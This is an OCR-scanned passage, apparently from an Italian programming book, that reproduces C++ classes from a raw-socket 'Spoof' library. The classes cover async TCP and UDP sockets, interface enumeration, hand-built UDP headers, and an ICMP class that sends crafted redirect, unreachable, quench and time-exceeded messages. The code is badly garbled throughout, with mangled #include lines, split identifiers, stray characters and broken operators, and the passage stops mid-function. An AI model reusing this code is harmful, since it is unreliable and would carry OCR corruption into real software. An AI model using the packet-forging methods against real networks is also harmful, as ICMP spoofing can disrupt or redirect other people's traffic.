static HINSTANCE 
BOOL 

CSocketThreadManager * 

static CSocketThreadManager * 
int 

static SocketMap 
BOOL 

static BOOL 
static HWND 



m bShuttingDown 

m_hLocalWindowHandle 

m_Initialized 

m_Instance 

tn_List 

m_pLocalThreadManager 

m_pThreadManager 

m_SocketID 

mSocketMap 

m_ Timeout 

m_Window 

m_WindowHandle 



Are we shutting down 

Our window's handle 

Are we initialized 

Instance of our window 

Are we in the list 

Our locai thread manager (to 
allow custom thread mangement) 

Our thread manager (global) 

ID of our socket 

Our list of sockets 

Timeout indicator 

Construction/Destruction 

Our window's handle 



Constructors 



CAsyncShutdown : : CAsyncShutdown ( ) 
CAsyncSocket () 



et or and dtor 
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Destructors 



virtual 



CAsyncShutdown : : ~CAsyncShutdown ( ) 
~CAsyncSocket () 



Functions 



void 

void 

void 
void 

virtual SOCKET 
static HINSTANCE 

static CAsyncSocket * 
int 

CSocketThreadManager * 
HWND 

static void 

BOOL 
BOOL 

virtual BOOL 
virtual BOOL 
virtual BOOL 

virtual BOOL 
virtual BOOL 

virtual BOOL 
virtual BOOL 
static BOOL 
static BOOL 
void 

virtual BOOL 

static BOOL 
static void 

BOOL 

static void 

static LRESULT CALLBACK 



AddSocketToList () 
AllocateHandle () 

CAsyncShutdown : : Noti fyShut down ( ) 
DeAllocateHandle () 
GetAsyncHandle () =0 
Getlnstance () 

GetSocketBylD ( int iSocklD ) 
GetSocketlD Q 

Get ThreadManager ( ) 

GetWindowHandle () 

Initialize ( ) 

IsTimeout () 
KillTimer Q 

OnSocketAccept ( int iErrorCode ) =0 

OnSocketClose ( int iErrorCode )=0 

OnSocket Connect ( int 
iErrorCode ) =0 

OnSocketOOB ( int iErrorCode )=0 

OnSocketReceive ( int 
iErrorCode ) =0 

OnSocket Timeout 0=0 

OnSocketWrite ( int iErrorCode ) =0 

RegisterWindow ( ) 

RemoveHandlers ( ) 

RemoveSocketFromList ( ) 

SetAsync () =0 

SetHandlers () 

Setlnstance f HINSTANCE hlnst ) 

SetTimeout ( int iMs ) 
Shutdown () 

SocketMessageHandler ( HWND hwnd, 
UINT uMsg, WPARAM wParam, LPARAM 
lParam ) 



Add the socket to the 
list 

Allocate ourself a 
window 



Remove from thread info 

Get the socket handle 

Get the instance of our 
APP 

Find a socket 

Get the ID of the 
socket 

Get our thread manager 
(global or locai) 

Get the handle of the 
window 

Initialize ali the 
handlers 

Do we have a timeout 
Disable the time 



Messaging methods 

Register our window 

Remove the handlers 

Remove the socket from 
the list 

Go to async regular 
mode 

Create our handlers 

Set the instace of our 
app 

Create a timeout 

Indicate a system 
shutdown 

Our window proc 



L'ennesima classe è la CTCPSocketAsync : 



iinclude "TCPSocket . h " 
^include "AsyncSocket . h " 
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class CTCPSocketAsync : 

public CTCPSocket, 
public CAsyncSocket 

{ 

public: 

//Close the socket 
virtual BOOL Close () ; 

//Our async connection 

virtual BOOL Connect (int iSourcePort, LPCSTR lpDestinationAddress, int 
iDestinationPort) ; 

//Listen to incoming connections 
virtual BOOL Listen (int iBackLog) ; 

//Create this socket as a regular socket 
virtual BOOL CreateRegular () ; 

//Create as a raw socket 
virtual BOOL Create (); 

//et or and dtor 
CTCPSocketAsync () ; 
virtual ~CTCP Socket Async () ; 
protected: 

//Go to async mode 
virtual BOOL SetAsyncO; 

//Set the socket to async mode 

virtual BOOL OnSocketConnect (int iErrorCode) ; 

//When the socket is accepted, what to do 
virtual void Accepted () ; 

//Get the socket handle 

virtual SOCKET GetAsyncHandle ( ) ; 



// TCP Socket Async. epp 

^include "stdafx.h" 
iinclude "TCPSocketAsync .h" 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

CTCPSocketAsync: : CTCPSocketAsync () : CTCPSocket () , CAsyncSocket ( ) 
{ 

} 

CTCPSocketAsync : : ~CTCP Socket Async () 
{ 

//We need to close it here 

try 

{ 

Close () ; 

} 

ERROR_HANDLER__AMBIG (CSpoof Socket, "~CTCPSocketAsync") 

ì 

BOOL CTCPSocket Async :: Connect ( int iSourcePort , LPCSTR lpDestinationAddress, int 

iDestinationPort) 

{ 

try 
{ 

//Quit if not ok 
if (!CheckSocketValid() ) 
return FALSE; 

//Set the async notification 
int iResult; 

iResult=WSAAsyncSelect (GetHandle () , GetWindowHandle () , WM__SOCKET_CONNECT , FD_CONNE 
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if (IResult) 
{ 

CTCPSocket : : SetLastError ( "Connect ") ; 
return FALSE; 

ì 

//Cali the originai connect 
BOOL bResult; 

bResult=CTCPSocket : -.Connect (ISourcePort , lpDestinationAddress, IDestinationPort) ; 

if (bResult) 

AddSocketToList () ; 

else 

CTCPSocket : -.ReportError ("Connect" , "Failed to connect!"); 
return bResult; 

} 

ERROR^HANDLER AMBIG RETURN ( CSpoof Socket , "Connect ", FALSE) 



BOOL CTCP Socket Async : -.Listen (int iBackLog) 
{ 

try 
( 

//Quit if not ok 
if (!CheckSocketValid() ) 
return FALSE; 

int iResult; 



); 



iResult=WSAAsyncSelect (GetHandle () , GetWindowHandle () , WM_SOCKET_ACCEPT , FD_ACCEPT 

if (iResult) 
{ 

CTCPSocket : : SetLastError ( "Listen ") ; 
return FALSE; 

) 

return CTCPSocket : : Listen (iBackLog) ; 

} 

ERROR_HANDLER_AMBIG_RETURN ( CSpoof Socket , "Listen ", FALSE) 



} 



BOOL CTCP Socket Async : : SetAsync () 
{ 

try 
{ 

//Quit if not ok 
if (!CheckSocketValid() ) 
return FALSE; 

//Set event to read / write / dose / oob 
int iResult; 

iResult=WSAAsyncSelect (GetHandle () , GetWindowHandle () , WM_SOCKET_GENERAL , FD^WRITE 
I FD_READ I FD_CLOSE / FD_OOB) ; 

if (iResult) 
{ 

CTCPSocket : : SetLastError ( "SetAsync ") ; 
return FALSE; 

) 

return TRUE; 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket, "SetAsync" , FALSE) 

) 

BOOL CTCP Socket Async : : OnSocketConnect (int iErrorCode) 
{ 

//First set async again 
return SetAsync ( ) ; 
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void CTCP Socket Async : :Accepted() 
{ 

try 
{ 

AddSocketToList () ; 

//Go to async mode 
SetAsync () ; 

} 

ERROR__HANDLER_AMBIG (CSpoof Socket , "CTCPSocketAsync ") 



SOCKET CTCPSocketAsync : : GetAsyncHandle ( ) 
{ 

return GetHandle () ; 

} 

BOOL CTCPSocketAsync : : CreateRegular () 
{ 

try 
{ 

if ('.CTCPSocket : : CreateRegular () ) 
return FALSE; 

else 
{ 

AddSocketToList () ; 
return TRUE; 

ì 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket , "CreateRegular" , FALSE) 

} 

BOOL CTCPSocketAsync: : Create () 
{ 

try 
{ 

if (! CTCPSocket. : : Create () ) 
return FALSE; 

else 
{ 

AddSocketToList () ; 
return TRUE; 

ì 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket, "Create ", FALSE) 

} 

BOOL CTCPSocketAsync: :Close () 
{ 

try 
{ 

//Quit if not ok 
if (IValidSocket () ) 
return FALSE; 

//Remove front socket list 
RemoveSocketFromList () ; 

ret urn CTCPSocket : :Close () ; 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket, "Close ", FALSE) 




Base C 1 a s s e s 



CTCPSocket 
CAsyncSocket 




Constructors 
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CTCPSocketAsync () 



Construction/Destruction 



Destructors 



virtual 



-CTCPSocketAsync () 



Functions 



virtual void 

virtual BOOL 
virtual BOOL 

virtual BOOL 
virtual BOOL 

virtual SOCKET 
virtual BOOL 
virtual BOOL 
virtual BOOL 



Accepted Q 
Close () 

Connect ( int iSourcePort, LPCSTR 
lpDestinationAddress, int 
iDestinationPort ) 

Create () 

CreateRegular ( ) 

GetAsyncHandle ( ) 

Listen ( int iBackLog ) 

OnSocket Connect ( int iErrorCode ) 

SetAsync ( ) 



When the socket is accepted, 
what to do 

Close the socket 

Our async connection 



Create as a raw socket 

Create this socket as a regular 
socket 

Get the socket handle 
Listen to incoming connections 
Set the socket to async mode 
Go to async mode 



La gestione delle interfacce viene eseguita dalla classe Cinterfaces .- 

iinclude "SpoofBase . h" 

class Cinterfaces : public CSpoofBase 
{ 

public: 

//Information about the interface 

BOOL IsMulticast () ; 

BOOL IsPPP(); 

BOOL IsLoopback () ; 

BOOL IsBroadcast () ; 

BOOL IsRunning () ; 

//Get the broadcast address 
long GetBroadcast () ; 

//Get the netmask 
long GetMask () ; 

//Move to the next interface 
BOOL MoveNext () ; 

//Get the interface address 
long Get Address () ; 

//Retreive the list of ali the interfaces 
BOOL Getlnterfaces () ; 

//et or and dtor 

Cinterfaces (int iMaxInterfaces=20) ; 
virtual ~CInterfaces () ; 



private : 



long GetFlags () ; 
//Our interface list 
INTERFACE_ INFO * m_pInfo; 

//Number of interfaces 
int m_iMaxInterfaces; 

//How many structures we have 
int m_iStructures; 



//Our position 
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// Interfaces . cpp 

iinclude "stdafx.h" 
iinclude "Interfaces .h" 



////////////////////////////////////////////////////////////////////// 
// Construction/Destructlon 

////////////////////////////////////////////////////////////////////// 

idefine CInterfaces_Class "CInterfaces" 

idefine CHECK^POSITION (METHOD_NAME, RETURN_VALUE) \ 

if (m_iPosition>=m_iStructures) \ 

f\ 

ReportError (METHOD_NAME , "Passed over!");\ 
return RETURN_VALUE ; \ 

} 



CInterfaces : : CInterfaces (int IMaxInterfaces) : CSpoofBase () 
{ 



try 
{ 



//Set our name 

SetName (CInterfaces Class ) ; 



//Allocate the Information 
m_iMaxInterfaces=iMaxInterfaces; 

//No structures retreived 
m_iStructures=0 ; 



//No position 
m_iPosition=0 ; 



//Allocate our info 
if ( ! IMaxInterfaces) 
m_pInfo=NULL; 

else 

m_pInfo=new INTERFACE_INFO [m_iMaxInterfaces ] ; 

} 

ERROR_HANDLER ( "CInterfaces ") 

} 

CInterfaces : : ~CInterfaces () 
{ 

try 
{ 

delete m_pInfo; 

} 

ERROR_HANDLER ( "~CInterfaces ") 

ì 



BOOL CInterfaces : : Getlnterfaces () 
{ 

if C !m_iMaxInterfaces) 
{ 

//structure not allocated 

ReportError ( "Getlnterfaces" , "You constructed the class with 0 

parameter ! ") ; 

return FALSE; 

} 



try 
{ 

//Allocate a socket 
SOCKET sok; 

sok=socket (AF_INET, SOCK_DGRAM, 0) ; 

//Check it ' s valid 

if (sok==INVALID_SOCKET) 

{ 

SetLastError ( "Getlnterfaces ") ; 
return FALSE; 

} 
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//Get the interface list 
unsigned long ulBytes; 

if (WSAIoctl (sok, SIO_GET_INTERFACE_LIST, NULL, NULL, m_pInfo, 

sizeof (INTERFACE_INFO) *m_iMaxInterfaces, &ulBytes, NULL, NULL) ) 
{ 

SetLastError ( "Getlnterfaces ") ; 

//dose the socket 
closesocket (sok) ; 

return FALSE; 

) 

//Check how many structures we have 
m_iStructures=ulBytes/sizeof ( INTERFACE_INFO) ; 

//Set our position to zero 
m_iPosition=0; 

//Close the socket 
closesocket (sok) ; 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "Getlnterfaces ", FALSE) 

) 

long CInterfaces: :GetAddress () 
{ 

CHECK_POSITION ( "GetAddress ", 0) 

try 
{ 

return (m pInfo+m_iPosition)—>iiAddress.AddressIn . sin^addr . S_un . S addr; 

} 

ERROR__HANDLER_RETURN ( "GetAddress ", 0) ; 

ì 

BOOL CInterfaces : :MoveNext ( ) 
{ 

++m_iPosition ; 

ret urn m_ iPosition <m_ iStruct ures ; 

) 

long CInterfaces : -.GetMask () 
{ 

CHECK_POSITION ( "GetMask ", 0) 

try 
{ 

return (m pInfo+m_iPosition)—>iiNetmask.AddressIn . sin^addr . S_un . S__addr; 

} 

ERROR_HANDLER_RETURN( "GetMask", 0) ; 

) 

long CInterfaces : : GetBroadcast () 
{ 

CHECKJPOSITION ("GetBroadcast ", 0) 

try 
{ 

return (m_pInfo+m_iPosition) — 
>HBroadcastAddress . Addressln . sin^addr . S_un . S_addr; 
} 

ERROR_HANDLER_RETURN( "GetBroadcast ", 0) ; 

) 

BOOL CInterfaces : : IsRunning ( ) 
{ 

return GetFlags () & IFF_UP; 

} 



BOOL CInterfaces : : IsBroadcast () 
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BOOL CInterfaces : : IsLoopback ( ) 

return GetFlags () & IFF_LOOPBACK ; 

BOOL CInterfaces : : IsPPP () 

return GetFlags () £ IFF^POINTTOPOINT ; 

BOOL CInterfaces : : IsMulticast () 

return GetFlags () & IFF_MULTICAST; 

long CInterfaces: -.GetFlags () 

CHECK_POSITION ( "GetFlags ", 0) 

try 
{ 

return (m _pInfo+m_iPosition)—>iiFlags; 

} 

ERROR__HANDLER_RETURN ( "GetFlags " , 0) ; 

ì 

III Base C 1 a s s e s 
CSpoofBase 




Data I t e m s 



int m_iMaxInterfaces Number of interfaces 

int m_iPositlon Our positlon 

int m_iStructures How many structures we have 

INTERFACE_ INFO * m_pInfo Our interface list 

III Constructors 

CInterfaces ( int iMaxInterfaces=20 ) ctor and dtor 

Hi Destructors 

virtual ~CInterfaces ( ) 

I Functioiis 



long 


GetAddress () 


Get the interface 


address 


long 


GetBroadcast () 


Get the broadcast 


address 


long 


GetFlags () 






BOOL 


Get Interfaces ( ) 


Retreive the list 


of ali the interfaces 


long 


GetMask () 


Get the netmask 




BOOL 


IsBroadcast () 






BOOL 


IsLoopback ( ) 






BOOL 


IsMulticast () 


Information about 


the interface 


BOOL 


IsPPP() 
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BOOL IsRunnlng ( ) 

BOOL MoveNext () Move to the next interface 

I socket per la gestione dei datagrammi UDP vengono gestiti tramite l'apposita classe 
chiamata CUDPSocket : 

iinclude " Spoof Socket . h " 

typedef struct _UDPHeader 
{ 

unsigned short SourcePort; 
unsigned short DestinationPort ; 
unsigned short Length; 
unsigned short Checksum; 
} UDPHeader; 

typedef UDPHeader FAR * LPUDPHeader ; 

idefine UDPHeaderLength sizeof (UDPHeader) 

class CUDPSocket : public CSpoof Socket 
{ 

public: 

//Create as aregular socket 
BOOL CreateRegular () ; 

//Allow UDP broadcast 

BOOL SetBroadcast (BOOL bBroadcast) ; 

//Send data 

BOOL Send(int iSourcePort, 

LPCSTR lpDestinationAddress, 
int iDestinationPort, 
char* buf, 
int Buf Length) ; 

//Create the socket 
BOOL Create (); 

//ctor and dtor 
CUDPSocket () ; 
virtual ~CUDPSocket () ; 
protected: 

//Last stop before modifying the header 

virtual void FinalUDPHeader (LPUDPHeader lpHeader) ; 

); 

// UDPSocket . cpp 

iinclude "stdafx.h" 
iinclude "UDPSocket . h " 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

CUDPSocket : : CUDPSocket () : CSpoofSocket () 

{ 

} 

CUDPSocket : : ~CUDPSocket () 

{ 

} 

BOOL CUDPSocket : -.Create () 
{ 

try 
{ 

SetProtocol (IPPROTOJUDP) ; 

return CSpoofSocket : : Create (IPPROTO_UDP) ; 

} 

ERROR_HANDLER_RETURN ( "Create ", FALSE) 

} 
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BOOL CUDPSocket : :Send(int iSourcePort, 

LPCSTR lpDestinationAddress , 
int iDestinationPort, 
char* buf, 
int BufLength) 

{ 

try 
{ 

//Quit if not ok 
if ( !CheckSocketValid() ) 
return FALSE; 

//We can construct the UDP here 
LPUDPHeader lpUDP; 
lpUDP=new UDPHeader; 

//Set the ports 

lpUDP->SourcePort=htons (iSourcePort) ; 
lpUDP—>DestinationPort=htons (iDestinationPort ) ; 

//Set the length 

lpUDP->Length=htons (UDPHeaderLength) ; 

//Check sum 
lpUDP->Checksum=0; 

BOOL bResult; 

if (BufLength) 
{ 

//Create the buffer 
int iTotalLength; 

iTotalLength=UDPHeaderLength+Buf Length; 
char* tmpBuf; 

tmpBuf=new char [iTotalLength] ; 
//Set the length 

lpUDP->Length=htons (iTotalLength) ; 

memcpy (tmpBuf , lpUDP, UDPHeaderLength) ; 

memcpy (tmpBuf+UDPHeaderLength, buf, BufLength) ; 

//Update it 
IpUDP- 

>Checksum=CalculatePseudoChecksum (tmpBuf, iTotalLength , lpDestinationAddress, iTotalLengt 
h); 

//Recopy it 

memcpy (tmpBuf , lpUDP, UDPHeaderLength) ; 
//Send it 

bResult=CSpoofSocket : : Send (lpDestinationAddress, tmpBuf, iTotalLength, iDestinatio 

nPort) ; 

//Delete 
delete tmpBuf; 

} 

else 
{ 

//Update it 
IpUDP- 

>Checksum=CalculateP seudoChecksum ( (char*) lpUDP, UDPHeaderLength, lpDestinationAddress, UD 
PHeaderLength) ; 

//Send it 

bResult=CSpoof Socket : : Send (lpDestinationAddress , (char*) lpUDP, UDPHeaderLength, iD 
estinationPort) ; 

} 



//Clean up 
delete lpUDP; 

return bResult; 
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ERROR_HANDLER_RETURN ( "Send ", FALSE) 

ì 

BOOL CUDPSocket : : SetBroadcast (BOOL bBroadcast) 
{ 

try 
{ 

//Quit if not ok 
if ( !CheckSocketValid() ) 
return FALSE; 

//Set broadcast option 

if (setsockopt (GetHandle () , SOL_SOCKET, SO_BROADCAST, (char*) SbBroadcast, sizeof (bBr 
oadcast) ) ==SOCKET_ERROR) 
{ 

//Check for options error 
SetLastError ( "SetBroadcast ") ; 
return FALSE; 

ì 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "SetBroadcast ", FALSE) 

} 

BOOL CUDPSocket : : CreateRegular () 
{ 

try 
{ 

SetProtocol ( IPPROTO_UDP ) ; 

return CSpoof Socket : : Create ( IPPROTO_UDP ) ; 

} 

ERROR_HANDLER_RETURN ( "CreateRegular ", FALSE) 

ì 

void CUDPSocket: -.FinalUDPHeader (LPUDPHeader lpHeader) 
{ 

//Nothing to do 

} 



Base C 1 a s s e s 



CSpoof Socket 



Constructors 



CUDPSocket ( ) Construction/Destruction 



Destructors 



virtual ~CUDPSocket () 



Functions 



BOOL 
BOOL 



Create () 
CreateRegular ( ) 



virtual void Final UDPHeader ( LPUDPHeader lpHeader ) 



BOOL 



BOOL 



Send ( int iSourcePort, LPCSTR 
lpDestinationAddress, int iDestinationPort, 
char* buf, int BufLength ) 

SetBroadcast ( BOOL bBroadcast ) 



Create the socket 

Create as aregular 
socket 

Last stop before 
modifying the header 

Send data 



Allow UDP broadcast 
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La serie di classi di base contempla anche quella CUDPSocketAsync: 

iinclude "UDPSocket . h " 
iinclude "AsyncSocket . h " 

class CUDPSocketAsync : 

public CUDPSocket, 
public CAsyncSocket 

{ 

public: 

//dose the socket 
virtual BOOL Close(); 

//Listen to incoming connections 
BOOL Listen (); 

//Create this socket as a regular socket 
virtual BOOL CreateRegular () ; 

//Create as a raw socket 
virtual BOOL Create (); 

//et or and dtor 
CUDPSocketAsync () ; 
virtual ~CUDP Socket Async () ; 
protected: 

//Go to async mode 
virtual BOOL SetAsyncO; 

//Set the socket to async mode 

virtual BOOL OnSocketConnect (int iErrorCode) ; 

//When the socket is accepted, what to do 
virtual void Accepted () ; 

//Get the socket handle 

virtual SOCKET GetAsyncHandle ( ) ; 

}; 

// UDP Socket Async . epp 

iinclude "stdafx.h" 
iinclude "UDP Socket Async . h " 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

CUDPSocketAsync: : CUDPSocketAsync () : CUDPSocket {) , CAsyncSocket ( ) 
{ 

} 

CUDPSocketAsync: : ~CUDPSocketAsync () 
{ 

//We need to dose it here 

try 

{ 

Close () ; 

} 

ERROR_HANDLER_AMBIG ( CSpoof Socket , "~CUDPSocketAsync") 

} 

BOOL CUDPSocketAsync :: Listen () 
{ 

try 
{ 

//Quit if not ok 
if ( !CheckSocketValid() ) 
return FALSE; 

int iResult; 
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±Result=WSAAsyncSelect (GetHandle () , GetWindowHandle () , WM_SOCKET_GENERAL, FD_READ) 

r 

if (iResult) 
{ 

CUDPSocket : : SetLastError ( "Listen ") ; 
return FALSE; 

ì 

return TRUE; 

} 

ERROR_HANDLER_AMBIG_RETURN ( CSpoof Socket , "Listen ", FALSE) 

} 

BOOL CUDPSocketAsync : :SetAsync() 
{ 

try 
{ 

//Quit if not ok 
if C !CheckSocketValid() ) 
return FALSE; 

//Set event to read / write 
int iResult; 



iResult=WSAAsyncSelect (GetHandle {) , GetWindowHandle () , WM_SOCKET_GENERAL , FD^WRITE 
I FD_READ) ; 

if (iResult) 
{ 

CUDPSocket : : SetLastError ( "SetAsync ") ; 
return FALSE; 

) 

return TRUE; 

} 

ERROR__HANDLER_AMBIG_RETURN (CSpoof Socket, "SetAsync" , FALSE) 

} 

BOOL CUDPSocketAsync: : OnSocketConnect (int iErrorCode) 
{ 

//First set async again 
return SetAsync () ; 

} 

void CUDPSocketAsync : :Accepted() 
{ 

try 
{ 

AddSocketToList () ; 

//Go to async mode 
SetAsync ( ) ; 

} 

ERROR_HANDLER_AMBIG (CSpoof Socket , "CTCP Socket Async ") 

) 

SOCKET CUDPSocketAsync : : GetAsyncHandle () 
{ 

return GetHandle (); 

} 

BOOL CUDPSocketAsync : : CreateRegular ( ) 
{ 

try 
( 

if ('.CUDPSocket : .-CreateRegular () ) 
return FALSE; 

else 
{ 

AddSocketToList () ; 
return TRUE; 

) 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket, "CreateRegular", FALSE) 
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BOOL CUDP Socket Async :: Create ( ) 
{ 



try 
{ 



if ( ! CUDPSocket : : Create () ) 
return FALSE; 

else 
{ 

AddSocketToList () ; 
return TRUE; 

ì 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket , "Create ", FALSE) 



BOOL CUDP Socket Async: : Close () 
{ 

try 
{ 



//Quit if not ok 
if (ÌValidSocket () ) 
return FALSE; 

//Remove from socket list 
RemoveSocketFromList () ; 

ret urn CUDPSocket : : Close () ; 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket, "Close ", FALSE) 



Base C 1 a s s e s 



CUDPSocket 
CAsyncSocket 



Constructors 



CUDPSocketAsync () 



Construction/Destruction 



Destructors 



virtual ~CUDP Socket Async ( ) 



Functions 



virtual void 

virtual BOOL 
virtual BOOL 
virtual BOOL 

virtual SOCKET 
BOOL 

virtual BOOL 
virtual BOOL 



Accepted ( ) 

Close () 
Create () 
CreateRegular ( ) 

GetAsyncHandle ( ) 
Listen () 

OnSocketConnect ( int 
iErrorCode ) 

SetAsync ( ) 



When the socket is accepted, what to 
do 

Close the socket 

Create as a raw socket 

Create this socket as a regular 
socket 

Get the socket handle 

Listen to incoming connections 

Set the socket to async mode 

Go to async mode 



Una libreria legata alla gestione di funzioni di rete non può non disporre di qualche parte 
espressamente progettata per l'implementazione delle funzionalità legate al protocollo ICMP. 
La classe CICMPSocket contiene i metodi per tale gestione: 
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iinclude "Spoof Socket . h " 

// Regular ICMP Header 
typedef struct ^ICMPHeader 
( 

unsigned char ICMPType; 

unsigned char ICMPCode; // Type sub code 

unsigned short ICMPChecksum; 

union 

( 

struct {unsigned char ucl , uc2 , uc3 , uc4 ; } sUC; 
struct (unsigned short usl,us2;} sUS; 
unsigned long sUL; 
} sICMP; 

unsigned long ICMP Originate_Timestamp; // Not standard field 

in header, but reserved nonetheless 

unsigned long ICMP_Receive_Timestamp; 

unsigned long ICMPTransmitTimestamp; 
} ICMPHeader; 

typedef ICMPHeader FAR * LPICMPHeader; 
idefine ICMPHeaderLength sizeof (ICMPHeader) 



// ICMP data size 
idefine ICMP__DATA_SIZE 8 



// ICMP Message unreachable 
idefine ICMP_Unreachable 3 
idefine ICMP_Unreachable_SIZE 8 



idefine ICMP_Unreachable_NET 0 
idefine ICMP_Unreachable_HOST 1 
idefine ICMP_Unreachable_PROTOCOL 2 
idefine ICMP__Unreachable_PORT 3 
idefine ICMP_ Unreachabl e__FRAGMENTATION 4 
idefine ICMP_Unreachable_SOURCE 5 



// ICMP Time exceeded 
idefine ICMP_Time 11 

idefine ICMP_Time_TRANSIT 0 
idefine ICMP_Time_FRAGMENT 1 

// ICMP Parameter problem 
idefine ICMP__Parameter 12 



idefine ICMP_Parameter_ERROR 0 



// ICMP Source quench 
idefine ICMP_Quench 4 

// ICMP Redirect 
idefine ICMP_Redirect 5 



idefine ICMP_Redirect_ 
idefine ICMP_Redirect„ 
idefine ICMP_Redirect_ 
idefine ICMP_Redirect_ 



NETWORK 0 
HOST 1 

SERVICE_NETWORK 2 
SERVICE_HOST 3 



// ICMP Echo 
idefine ICMP_Echo 8 
idefine ICMP_Echo__Reply 0 



// ICMP Timestamp 
idefine ICMP_Timestamp 13 
idefine ICMP_Timestamp_Reply 14 

// ICMP Information request 
idefine ICMP_Information 15 
idefine ICMP_Information__Reply 16 

idefine ICMP_Information_SIZE 8 
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//Max buf 

idefine ICMP__BUF 100 

class CICMPSocket : public CSpoof Socket 
{ 

public: 

//Get the last ICMP data 
const char* GetLastICMPData () ; 

//Get the last ICMP - IP header 

const LPIpHeader GetLastlCMPIPHeader () ; 

//Get the last ICMP header size 
unsigned long GetLastDataSize () ; 

//The the last IP header 

const LPIpHeader GetLastlPHeader () ; 

//Get the last ICMP header 

const LPICMPHeader GetLast ICMPHeader ( ) ; 

//Send ICMP messages according to the name 

BOOL Sendlnformation (LPCSTR lpDestinationAddress, BOOL bReply, unsigned short 
usldentifier, unsigned short usSequence) ; 

BOOL SendTimestamp (LPCSTR lpDestinationAddress , BOOL bReply , unsigned short 
usldentifier, unsigned short usSequence, unsigned long ulOriginateTimestamp, unsigned 
long ulReceiveTimestamp, unsigned long ulTransmitTimestamp) ; 

BOOL SendEcho (LPCSTR lpDestinationAddress, BOOL bReply, unsigned short 
usldentifier, unsigned short usSequence, unsigned long ulData) ; 

BOOL SendRedirect (LPCSTR lpDestinationAddress, unsigned char cType, LPCSTR 
lpGatewayAddress ) ; 

BOOL SendQuench (LPCSTR lpDestinationAddress) ; 

BOOL SendParameter (LPCSTR lpDestinationAddress, unsigned char cError) ; 

BOOL SendTime (LPCSTR lpDestinationAddress , unsigned char cType) ; 

BOOL SendUnreachable (LPCSTR lpDestinationAddress, unsigned char cType) ; 

//Create an ICMP socket 
virtual BOOL Create (); 

//et or and dtor 
CICMPSocket () ; 
virtual ~CICMPSocket ( ) ; 
private: 

//The data 
char* m^Data; 

//The ICMP IP header 
LPIpHeader m_ICMPIPHeader; 

//Reverse the header (big little endian) 
void ReverseHeader () ; 

//The data size 

unsigned short m DataSize; 

//The IP header 
LPIpHeader m_IPHeader; 

//The ICMP header 
LPICMPHeader m__ICMPHeader ; 

//Send the data 

BOOL Send (LPCSTR lpDestinationAddress, unsigned char cICMP, unsigned char cType) ; 
protected: 

//Construct an ICMP header 

virtual LPICMPHeader ConstructICMP () ; 

/ /Proccess incoming ICMP data 
virtual BOOL ProccessICMP (char* buf) ; 



// ICMPSocket . epp 

iinclude "stdafx.h" 
iinclude "ICMPSocket . h " 
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////////////////////////////////////////////////////////////////////// 

// Construction/Destructlon 

////////////////////////////////////////////////////////////////////// 
idefine CIC_LOGNAME "CICMPSocket" 

CICMP Socket : : CICMPSocket () : CSpoof Socket () 
{ 

try 

{ 

SetName ( CIC LOGNAME ) ; 

//Our data structures 
m_Dat a=NULL; 
m_ICMPHeader=NULL; 
m_IPHeader=NULL; 
m_ICMPIPHeader=NULL; 

} 

ERROR_HANDLER ( "CICMPSocket ") 



CICMPSocket : : ~CICMPSocket () 
{ 



try 
{ 

if (m_Data) 

delete [] m_J3ata; 

if (m_IPHeader) 

delete m_IPHeader; 

if (m_ICMPHeader) 

delete m_ICMPHeader; 

if (m__ICMPIPHeader) 

delete m_ICMPIPHeader ; 

} 

ERROR_HANDLER ( "~CICMPSocket ") 



} 



BOOL CICMPSocket : : Create () 
{ 

try 
{ 

SetProtocol (IPPROTO_ICMP) ; 
//Create the socket 

return CSpoof Socket : : Create (IPPROTO_ICMP) ; 

} 

ERROR_HANDLER_RETURN ( "Create ", FALSE) 

} 

BOOL CICMPSocket : : SendUnreachable (LPCSTR lpDestinationAddress, unsigned char cType) 
{ 

try 
{ 

return Send (lpDestinationAddress, ICMP_Unreachable , cType) ; 

} 

ERROR_HANDLER_RETURN ( "SendUnreachable ", FALSE) 

) 

LPICMPHeader CICMPSocket : : ConstructICMP () 
{ 



try 
{ 



//Constructs a basic ICMP header 
LPICMPHeader lpHead; 
lpHead=new ICMPHeader; 

//Set ali as zeros 

memset (lpHead, 0, ICMPHeaderLength) ; 
//Set the timestamp 

lpHead->ICMP_Originate_Timestamp=GetTickCount () ; 
//Return it 
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ERROR_HANDLER_RETURN ( "ConstructICMP ", FALSE) 

ì 

BOOL CICMP 'Socket : :SendTime (LPCSTR lpDestinationAddress, unsigned char cType) 
{ 

try 
{ 

return Send (lpDestinationAddress, ICMP Time, cType) ; 

} 

ERROR_HANDLER_RETURN ( "SendTime ", FALSE) 

) 

BOOL CICMPSocket : : Send (LPCSTR lpDestinationAddress, unsigned char cICMP, unsigned char 

cType) 

{ 

try 
{ 

//Generic ICMP send 
LPICMPHeader lpHead; 
lpHead=ConstructICMP () ; 

if (! lpHead) 
{ 

ReportError ("Send" , "Failed to construct ICMP header!"); 
return FALSE; 

) 

lpHead->ICMPType=cICMP ; 
lpHead->ICMPCode=cType ; 

//And the checksum 

lpHead—>ICMPChecksum=CalculateChecksum ( (unsigned 
short *) lpHead, ICMPHeaderLength) ; 

//Send it 
BOOL bSend; 

bSend=CSpoof Socket : : Send (lpDestinationAddress , (char*) lpHead, ICMPHeaderLength) ; 

//Clear up 
delete lpHead; 

return bSend; 

} 

ERROR_HANDLER_RETURN ( "Send ", FALSE) 



} 



BOOL CICMPSocket :: SendParameter (LPCSTR lpDestinationAddress, unsigned char cError) 
{ 

try 

{ 

LPICMPHeader lpHead; 
lpHead=ConstructICMP () ; 

if (! lpHead) 
{ 

ReportError ( "SendParameter ", "Failed to construct ICMP header!"); 
return FALSE; 

) 

lpHead->ICMPType=ICMP_Parameter; 
lpHead->ICMPCode=ICMP_Parameter_ERROR; 
lpHead->sICMP . sUC . ucl=cError; 

